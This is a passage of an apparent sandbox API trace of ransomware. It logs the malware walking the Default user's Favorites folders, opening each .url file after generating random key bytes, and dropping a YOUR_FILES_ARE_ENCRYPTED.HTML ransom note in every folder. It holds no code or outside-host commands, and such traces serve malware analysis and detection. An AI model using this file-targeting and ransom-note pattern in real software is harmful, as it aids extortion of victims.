RandomBuffer=0x4ebdaf8) returned 1 [0171.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.308] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=134) returned 1 [0171.308] CloseHandle (hObject=0x600) returned 1 [0171.308] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0171.308] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.308] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0171.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.309] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.311] CloseHandle (hObject=0x5f8) returned 1 [0171.311] GetProcessHeap () returned 0x270000 [0171.312] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.312] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0171.312] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0171.312] GetProcessHeap () returned 0x270000 [0171.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.312] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" [0171.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*" [0171.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.315] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.315] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0171.315] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0171.315] lstrcmpW (lpString1="MSN Autos.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.315] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0171.316] lstrlenW (lpString=".url") returned 4 [0171.316] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0171.316] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.316] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.316] CloseHandle (hObject=0x600) returned 1 [0171.316] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0171.316] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0171.316] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.316] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0171.316] lstrlenW (lpString=".url") returned 4 [0171.316] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0171.316] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.317] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.317] CloseHandle (hObject=0x600) returned 1 [0171.317] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0171.317] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0171.317] lstrcmpW (lpString1="MSN Money.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.317] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0171.317] lstrlenW (lpString=".url") returned 4 [0171.317] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0171.317] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.318] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.318] CloseHandle (hObject=0x600) returned 1 [0171.318] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0171.318] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0171.318] lstrcmpW (lpString1="MSN Sports.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.318] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0171.318] lstrlenW (lpString=".url") returned 4 [0171.318] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0171.318] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.318] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.318] CloseHandle (hObject=0x600) returned 1 [0171.318] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a35a1b1, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0171.318] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0171.318] lstrcmpW (lpString1="MSN.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.318] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0171.319] lstrlenW (lpString=".url") returned 4 [0171.319] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0171.319] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.319] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.319] CloseHandle (hObject=0x600) returned 1 [0171.319] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0171.319] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0171.319] lstrcmpW (lpString1="MSNBC News.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.319] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0171.319] lstrlenW (lpString=".url") returned 4 [0171.319] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0171.319] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.320] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.320] CloseHandle (hObject=0x600) returned 1 [0171.320] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0171.320] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.320] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0171.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\msn websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.320] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.322] CloseHandle (hObject=0x5f8) returned 1 [0171.322] GetProcessHeap () returned 0x270000 [0171.323] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.324] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0171.324] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0171.324] GetProcessHeap () returned 0x270000 [0171.324] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.324] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live" [0171.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*" [0171.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.327] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.327] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0171.327] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0171.327] lstrcmpW (lpString1="Get Windows Live.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.327] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0171.327] lstrlenW (lpString=".url") returned 4 [0171.327] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0171.327] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.328] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.328] CloseHandle (hObject=0x600) returned 1 [0171.328] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc982040, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc982040, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0171.328] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0171.328] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.328] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0171.328] lstrlenW (lpString=".url") returned 4 [0171.328] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0171.328] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.329] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.329] CloseHandle (hObject=0x600) returned 1 [0171.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3cc5d2, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0171.329] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0171.329] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.329] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0171.329] lstrlenW (lpString=".url") returned 4 [0171.329] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0171.329] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.329] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.329] CloseHandle (hObject=0x600) returned 1 [0171.330] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a418892, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0171.330] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0171.330] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.330] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0171.330] lstrlenW (lpString=".url") returned 4 [0171.330] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0171.330] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.330] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.330] CloseHandle (hObject=0x600) returned 1 [0171.330] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a418892, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, 